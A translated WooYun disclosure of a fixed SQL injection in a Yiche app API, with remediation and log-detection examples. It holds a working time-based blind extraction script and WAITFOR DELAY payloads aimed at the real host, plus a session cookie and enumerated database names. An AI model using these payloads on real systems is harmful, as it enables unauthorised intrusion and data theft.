
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0149383

Title: SQL injection at a Yiche (易车网) endpoint (reaches 25 databases and all their data), with verification script

Vendor: Yiche (易车)

Author: 路人甲

Submitted: 2015-10-26 10:57

Fixed: 2015-12-10 11:00

Published: 2015-12-10 11:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-10-26: details sent to the vendor, awaiting handling
2015-10-26: vendor confirmed; details visible to the vendor only
2015-11-05: details opened to core white hats and domain experts
2015-11-15: details opened to regular white hats
2015-11-25: details opened to intern white hats
2015-12-10: details opened to the public

Brief description:

SQL injection in Yiche

Detailed description:

Target: the official Yiche app (API backend)
Testing found an injection in the following place: the carids field of the POST body (stacked queries)

POST http://api.ycapp.yiche.com/Car/GetCarStylePropertys HTTP/1.1
Host: api.ycapp.yiche.com
Cookie: __cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1
Accept-Encoding: gzip,deflate
X-Requested-With: XMLHttpRequest
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
carids=114069,114070,114071,114018,114065,114067,114064,114066,114068,102164,102159,102163,102155,102148,102147,102152


sqlmap evidence screenshot:

[screenshot: sqlmap.jpg]


Looking at the site, there is no filtering or WAF to speak of, yet sqlmap could not enumerate the database names.
I. Method for extracting data
On further investigation: because this parameter already contains commas, the application script splits it on commas as a delimiter, so a comma never reaches the database. In effect the comma is filtered, which means the injected statement cannot contain a comma.
On MySQL one would simply write substr(user() from 1 for 1) instead of substr(user(),1,1), but this database is MSSQL, which only supports substring(user,1,1) and therefore needs the comma.
The workaround is string comparison: MSSQL compares strings character by character by ASCII value regardless of length, and stops as soon as the first N characters decide the ordering. On this principle DB_NAME() and similar values can be deduced one character at a time, e.g.

; if(db_name()>'Y') waitfor delay '0:0:5'-- -


; if(db_name()>'YI') waitfor delay '0:0:5'-- -


Keep enumerating the last character until the whole name is recovered.
The Python program is below, using the 11-character current database name as the example (a proxy is configured in the program; remove it if you want to send requests directly):

#!/usr/bin/env python
#coding=utf8
# Time-based blind extraction of DB_NAME(), one character per position.
# Each request asks the server "is db_name() < <known prefix> + <candidate char>?";
# a ~5 s delay means yes, so the previous candidate (a-1) is the next character.
import httplib, urllib, re, time

count = 0          # 1 while a delay still needs a second confirming request
user_name = ''     # characters recovered so far
httpClient = None
for i in range(1, 15):
    a = 33         # first printable ASCII character
    while a < 128:
        try:
            params = 'carids=114069;if(db_name()<\'' + user_name + chr(a) + '\') waitfor delay \'0:0:5\' -- -'
            headers = {"Host": "api.ycapp.yiche.com",
                       "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
                       "Accept-Encoding": "gzip,deflate",
                       "Accept": "*/*",
                       "Cookie": "__cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1",
                       "Connection": "keep-alive",
                       "X-Requested-With": "XMLHttpRequest",
                       "Content-Type": "application/x-www-form-urlencoded",
                       "Content-Length": len(params)}
            # Requests are sent through a local proxy (192.168.1.2:8888); drop the proxy to connect directly
            httpClient = httplib.HTTPConnection("192.168.1.2", 8888, timeout=30)
            httpClient.request("POST", "http://api.ycapp.yiche.com/Car/GetCarStylePropertys", params, headers)
            st = time.time()
            response = httpClient.getresponse()

            #rp = response.read()
            if count == 1:
                # second request for the same candidate: confirm the delay
                if time.time() - st > 5:
                    user_name = user_name + chr(a - 1)
                    print "db_name: " + user_name
                    count = 0
                    break
                else:
                    count = 0
            else:
                if time.time() - st > 5:
                    # first delay seen: re-test the same candidate to rule out network jitter
                    count = 1
                    a = a - 1
            a = a + 1

        except Exception, e:
            print e
        finally:
            if httpClient:
                httpClient.close()
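The root cause described in section I is that the application splits carids on commas and concatenates the pieces into the SQL text, so a ";" in the field becomes a stacked query. The following is an added example of how the endpoint should handle the field instead; it is not the project's own code. It uses an in-memory sqlite3 table with constructed rows, and the table and column names (car_style, car_id, style_name) and the id limit are assumptions, but the "?" placeholder style is the same one pyodbc uses against SQL Server.

```python
import re
import sqlite3

# Constructed sample rows standing in for the car-style table; the schema is an
# assumption for this example, not the affected service's real schema.
SAMPLE_CAR_STYLES = [
    (114069, "Style A"),
    (114070, "Style B"),
    (102164, "Style C"),
]

MAX_IDS = 50  # assumed upper bound on how many ids one request may carry


def parse_carids(raw):
    """Turn the carids form field into a list of ints.

    Only digits and commas are accepted, so a value such as
    "114069;if(db_name()>'Y') waitfor delay '0:0:5'-- -" is rejected
    before anything is sent to the database. Empty items are rejected too.
    """
    if not isinstance(raw, str) or not re.fullmatch(r"\d+(,\d+)*", raw):
        raise ValueError("carids must be a comma-separated list of integers")
    ids = [int(item) for item in raw.split(",")]
    if len(ids) > MAX_IDS:
        raise ValueError("too many ids")
    return ids


def get_car_style_properties(conn, raw):
    """Parameterised lookup: the ids travel as bound parameters, never as SQL text."""
    ids = parse_carids(raw)
    placeholders = ",".join("?" * len(ids))  # one '?' per id
    sql = ("SELECT car_id, style_name FROM car_style "
           "WHERE car_id IN (%s) ORDER BY car_id" % placeholders)
    return conn.execute(sql, ids).fetchall()


def make_sample_db():
    """Build the constructed in-memory table used by this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE car_style (car_id INTEGER PRIMARY KEY, style_name TEXT)")
    conn.executemany("INSERT INTO car_style VALUES (?, ?)", SAMPLE_CAR_STYLES)
    return conn


if __name__ == "__main__":
    conn = make_sample_db()
    print(get_car_style_properties(conn, "114069,102164"))
    try:
        get_car_style_properties(conn, "114069;if(db_name()>'Y') waitfor delay '0:0:5'-- -")
    except ValueError as exc:
        print("rejected:", exc)
```

Validating the field as a strict integer list and binding each id as a parameter closes both halves of the problem: the comma splitting no longer matters, and a stray ";" can never become a second statement.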


II. Proof via data
1) Current database: YICHEMOBILE

;if(db_name='XXX') waitfor delay '0:0:3' -- -


(XXX enumerated using the principle from section I)

[screenshot: db_name.jpg]


2) Number of databases: 25 in total

carids=114069;if((select count(*) from master.dbo.sysdatabases)=25) waitfor delay '0:0:3' -- -


3) All database names; only some are listed here, the rest were not enumerated

carids=114069;if((select name from master.dbo.sysdatabases where dbid=YYY)='XXX') waitfor delay '0:0:3' -- -


(XXX enumerated per section I; YYY runs from 1 to 25, which yields all 25 database names)
================
MASTER
TEMPDB
MODEL
MSDB
BITAUTOUSERCRM
BITAUTOBI
BITAUTOUGCMONITOR
YICHEMALLPAYMENT
MARKETINVOICE
DEALERASSISTANTSYSTEM
YICHEMOBILE
YICHEMOBILECOMMUNITY
YICHEACTIVITY
YICHEMEDIA
YICHEMOBILESUBSCRIBE
MARKETCOUPONS
......
......
================

[screenshot: dbs.jpg]


4) Looking at the current database YICHEMOBILE: 930 tables in total

carids=114069;if((select count(*) from yichemobile.dbo.sysobjects)=930) waitfor delay '0:0:5' -- -


5) Two table names as a sample; the other tables and the actual data were not looked into~

carids=114069;if((select top 1 name from yichemobile.dbo.sysdatabases)='XXX') waitfor delay '0:0:3' -- -


[screenshot: TABLES.jpg]
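Every payload in sections I and II shares the same shape: a ";" after an integer id, an if(...) around a catalog query, and a WAITFOR DELAY whose effect shows up as a multi-second response. The following is an added example of a log scan that flags that shape; it is not part of the original report. The log format (method, path, latency in ms, URL-encoded body, space-separated) and the SLOW_MS threshold are assumptions, and the sample lines are constructed from the page's own payloads.

```python
import re
from urllib.parse import unquote_plus

# Patterns that have no business in a field meant to carry integer ids.
# Matching is done on the URL-decoded body, case-insensitively.
SUSPICIOUS = [
    ("stacked_query", re.compile(r";\s*(if|select|exec|declare|waitfor)\b", re.I)),
    ("time_delay", re.compile(r"\bwaitfor\s+delay\b|\bsleep\s*\(|\bbenchmark\s*\(", re.I)),
    ("catalog_probe", re.compile(r"\b(sysdatabases|sysobjects|information_schema)\b", re.I)),
]

SLOW_MS = 3000  # assumed threshold: a reply this slow plus a ';' in the body is worth a look


def classify_body(body):
    """Return the names of every pattern that matches the decoded POST body."""
    decoded = unquote_plus(body)
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]


def parse_log_line(line):
    """Constructed format: <method> <path> <latency_ms> <url-encoded body>."""
    method, path, latency, body = line.split(" ", 3)
    return method, path, int(latency), body


def scan_log(lines):
    """Return (line_no, path, reasons) for each request an analyst should review."""
    hits = []
    for n, line in enumerate(lines, 1):
        method, path, latency, body = parse_log_line(line)
        reasons = classify_body(body)
        # Timing-based payloads also leave a latency fingerprint; pair it with the separator.
        if latency >= SLOW_MS and ";" in unquote_plus(body):
            reasons.append("slow_with_separator")
        if reasons:
            hits.append((n, path, reasons))
    return hits


# Constructed sample log: one normal request, two built from the report's payloads,
# and one slow but benign request that must not be flagged.
SAMPLE_LOG = [
    "POST /Car/GetCarStylePropertys 120 carids=114069,114070,114071",
    "POST /Car/GetCarStylePropertys 5210 carids=114069%3Bif(db_name()%3C'YI')+waitfor+delay+'0:0:5'+--+-",
    "POST /Car/GetCarStylePropertys 3050 carids=114069%3Bif((select+count(*)+from+master.dbo.sysdatabases)%3D25)+waitfor+delay+'0:0:3'+--+-",
    "POST /Car/GetCarStylePropertys 4100 carids=114069,114070",
]

if __name__ == "__main__":
    for line_no, path, reasons in scan_log(SAMPLE_LOG):
        print("line %d %s: %s" % (line_no, path, ", ".join(reasons)))
```

The latency rule on its own would also catch the benign slow request on the last line, which is why it is only applied together with the ";" separator; the pattern rules on their own would miss a payload that used a delay primitive not in the list, which is why the latency rule is there at all.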

Proof of vulnerability:

Fix recommendation:

Comments welcome~

Copyright notice: when reposting, credit 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed at: 2015-10-26 10:59

Vendor reply:

Many thanks for helping Yiche; we will handle it as soon as possible. Thank you.

Latest status:

2015-10-27: Fixed; many thanks for supporting Yiche. Thank you.